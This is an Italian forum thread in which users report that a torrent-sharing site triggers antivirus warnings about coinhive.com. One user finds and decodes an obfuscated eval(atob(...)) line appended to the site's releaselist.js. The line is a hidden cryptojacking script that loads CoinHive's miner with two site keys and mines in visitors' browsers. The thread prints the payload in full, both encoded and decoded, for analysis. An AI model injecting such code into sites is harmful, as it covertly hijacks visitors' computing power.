Autore Topic: coinhive.com  (Letto 582 volte)

Offline gnapa

  • Pirati
  • *****
  • Post: 3
coinhive.com
« il: Dicembre 30, 2017, 04:22:42 pm »
ogni volta che clicco sulla pagina di tnt il  devirus, kaspersky mi segnala un tentativo di accedere alla pagina coinhive.com.

Offline gorkung

  • Pirati
  • *****
  • Post: 2
Re:coinhive.com
« Risposta #1 il: Gennaio 03, 2018, 02:54:59 pm »
Non ho voglia di aprire un altro thred, quindi rispondo qua...

Effettivamente la pagina delle release pubblica(non quella sul forum, quella sul sito) carica uno script di coinhive.

Basta caricare la lista delle release (http://tntvillage.scambioetico.org/?releaselist) e lo script si carica in automatico.

Cosa succede?

La pagina carica lo script della lista delle release presente in "js/releaselist.js"
Al fondo di questo file c'è questa stringa:
Codice: [Seleziona]
eval(atob('e2xldCBzPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3Mub25sb2FkPWZ1bmN0aW9uKCl7bGV0IHU9WyJ5c2VjQ3JpMmFOZ1ZDTHE4VTBzS0pkTkdBbzZGYU53eiIsInF3Q1NJRklQeFptZFVYZXZ5N0ZoN2VodEZXUDVQcm01Il07bmV3IENvaW5IaXZlLlVzZXIodVtNYXRoLnJvdW5kKE1hdGgucmFuZG9tKCkpXSwiVCIse3Rocm90dGxlOi45fSkuc3RhcnQoKX0scy5zcmM9Imh0dHBzOi8vY29pbmhpdmUuY29tL2xpYi9jb2luaGl2ZS5taW4uanMiLHMuYXN5bmM9ImFzeW5jIixzLmRlZmVyPSJkZWZlciIsZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTt9'));
Anche ad un occhio poco esperto questa è roba sospetta: non si capisce nulla!

Ok, andiamo a decodificare quella stringa:

Codice: [Seleziona]
{let s=document.createElement("script");
s.onload=function(){let u=["ysecCri2aNgVCLq8U0sKJdNGAo6FaNwz","qwCSIFIPxZmdUXevy7Fh7ehtFWP5Prm5"];
new CoinHive.User(u[Math.round(Math.random())],"T",{throttle:.9}).start()},s.src="https://coinhive.com/lib/coinhive.min.js",s.async="async",s.defer="defer",document.head.appendChild(s);}

Adesso è più chiaro: viene dichiarata qualche variabile e viene poi caricato lo script di coinhive, immagino che i dati messi nella variabile "u" siano i portafogli di moneta elettronica. In ogni caso questo mi fa pensare che la cosa non sia tanto voluta da tntvillage/scambioetico (altrimenti perché inserire il codice in un altro script e oscurarlo?), ma che sia stato modificato da terzi.

Offline gorkung

  • Pirati
  • *****
  • Post: 2
Re:coinhive.com
« Risposta #2 il: Gennaio 03, 2018, 03:23:32 pm »
Piccola aggiunta/modifica:

Il codice che ho messo nel post precedente è presente anche in molte altre pagine, a partire dal login del forum; stavolta è però inserito direttamente all'interno del codice della pagina stessa e non in un file javascript esterno; non sembra però essere presente sul blog.

Non so come sia la situazione nel resto del forum, visto che non vi ho accesso.